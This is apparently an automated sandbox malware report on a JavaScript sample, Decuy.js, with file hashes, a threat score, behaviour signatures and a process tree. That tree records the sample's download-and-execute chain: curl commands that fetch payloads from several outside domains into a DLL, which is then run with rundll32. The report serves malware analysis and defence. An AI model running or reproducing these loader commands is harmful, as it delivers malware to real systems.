Overview

overview

8

Static

static

1

Decuy.js

windows7-x64

8

Decuy.js

windows10-1703-x64

8

Decuy.js

windows10-2004-x64

8

Decuy.js

windows11-21h2-x64

8

Analysis

  • max time kernel
    1s
  • max time network
    125s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231215-en
  • resource tags

    arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22/12/2023, 13:25

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Decuy.js

  • Size

    64KB

  • MD5

    1d3f6ed7311735a444d6476a38e7aee1

  • SHA1

    417c149545b2540c77a795570fbfff6c8e97dc17

  • SHA256

    3f0abcafae8954ff4b4638efb83a7e286bf8aa2876032dab9f778cb91b74c984

  • SHA512

    b297ec60eb79203726445c43dd01d2eebb417d0376b85c3250391297df72ce56687f0ce032724d4fba3ea1364cfe624f923dc994e2e2be64f3bf87c9dc4e9be5

  • SSDEEP

    768:U0lkTF16szQM0NHMSK6Plp7lx1VghlNm7PUKmeHlRGcZgx/4jYx0WAdl2Albhcoz:U0USszFKEkcp2EUfgK4ze3nKT7EcVW

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies system certificate store 2 TTPs 8 IoCs
    evasionspywaretrojan

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Decuy.js
    1⤵
    • Blocklisted process makes network request
    • Modifies system certificate store
    PID:4848
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://adanacigkoftesiparis.com/ViUbB/0.7020556503286075.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
      2⤵
        PID:1160
        • C:\Windows\system32\curl.exe
          curl https://adanacigkoftesiparis.com/ViUbB/0.7020556503286075.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
          3⤵
            PID:3108
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://adanacamasiryikama.com/BDs19Ul/0.04543440912800589.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
          2⤵
            PID:4952
            • C:\Windows\system32\curl.exe
              curl https://adanacamasiryikama.com/BDs19Ul/0.04543440912800589.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
              3⤵
                PID:784
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl 0.42531560385772815.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
              2⤵
                PID:2728
                • C:\Windows\system32\curl.exe
                  curl 0.42531560385772815.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                  3⤵
                    PID:3540
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter
                  2⤵
                    PID:4744
                    • C:\Windows\system32\timeout.exe
                      timeout 10
                      3⤵
                      • Delays execution with timeout.exe
                      PID:4260
                    • C:\Windows\system32\rundll32.exe
                      rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter
                      3⤵
                        PID:3300
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl 0.7380442988907985.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                      2⤵
                        PID:1312
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://kartvizitfiyatlari.com/rLhb/0.1779644560948916.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                        2⤵
                          PID:3636
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://mexicopostalcode.com/51h6Kn/0.21997761945762384.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                          2⤵
                            PID:1264
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://ucakbiletsorgulama.com/U14/0.6387453064165083.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                            2⤵
                              PID:424
                          • C:\Windows\system32\curl.exe
                            curl https://mexicopostalcode.com/51h6Kn/0.21997761945762384.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                            1⤵
                              PID:2928
                            • C:\Windows\system32\curl.exe
                              curl https://ucakbiletsorgulama.com/U14/0.6387453064165083.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                              1⤵
                                PID:5052
                              • C:\Windows\system32\curl.exe
                                curl 0.7380442988907985.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                                1⤵
                                  PID:2804
                                • C:\Windows\system32\curl.exe
                                  curl https://kartvizitfiyatlari.com/rLhb/0.1779644560948916.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                                  1⤵
                                    PID:2252

                                  Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads